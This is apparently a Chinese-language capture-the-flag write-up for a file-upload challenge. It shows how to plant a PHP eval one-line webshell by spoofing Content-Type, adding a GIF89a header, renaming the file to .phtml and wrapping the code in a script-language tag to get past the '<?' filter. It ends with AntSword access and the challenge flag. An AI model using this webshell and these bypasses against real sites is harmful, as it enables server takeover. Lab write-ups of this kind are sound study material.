目录
然后发现出现不是图片的原因是因为Content-Type是文本类型,所以改成图片的类型
php被过滤了,不能是php文件,那么把后缀名改成或者php5、txt、phtml试一下(优先尝试phtml)
打开页面,猜测可能是文件上传,然后慢慢尝试
先上传一个一句话木马文件
文件名demo.php
说不是文件
抓个包
发送到repeter
然后发现出现不是图片的原因是因为Content-Type是文本类型,所以改成图片的类型
php被过滤了,不能是php文件,那么把后缀名改成或者php5、txt、phtml试一下(优先尝试phtml)
说明<?被过滤了
需要绕过他
<script language="php">@eval($_POST["cmd"]);</script>
由此可知,图片是有一个图片头的,可以用010editer打开看一下
图片头为GIF89a
完成上传
接着访问一下
<script language="php">@eval($_POST["cmd"]);</script>
这句话是不应该出现的,可能是文件名后缀不对,放在蚁剑上,发现不能打开
把文件名后缀改成phtml
发现正确
再添加到蚁剑上
根目录下找到flag
找到答案
flag{7a3e410d-5abb-4cf0-a0c6-2a48179519ea}